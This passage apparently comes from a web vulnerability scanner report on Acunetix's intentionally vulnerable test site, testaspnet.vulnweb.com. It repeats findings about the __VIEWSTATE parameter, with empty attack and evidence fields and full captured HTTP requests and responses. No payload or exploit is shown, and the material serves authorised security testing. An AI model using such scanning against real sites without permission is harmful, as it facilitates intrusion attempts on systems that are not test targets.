style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:White" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1177 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,177 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8584&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgBA0nFYe9sIZGRkGkxiDKDalAUlQqNyAAtbn6el3pg%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKQvo3RBQKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCkW7Iy2LctwZm%2FPU0pOoZ1DGV9o8
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:19:52 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgBA0nFYe9sIZGRkGkxiDKDalAUlQqNyAAtbn6el3pg=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKQvo3RBQKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCkW7Iy2LctwZm/PU0pOoZ1DGV9o8" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:White" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8588&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgBAeRt9ftsIZGRkax0b%2BFYJXpbZSMIhhQNeEe0BIf0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLeqYPsBAKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCsga9UZWPbk5I%2FuHmCSHy%2BRMQKMD
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:31:33 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgBAeRt9ftsIZGRkax0b+FYJXpbZSMIhhQNeEe0BIf0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLeqYPsBAKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCsga9UZWPbk5I/uHmCSHy+RMQKMD" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 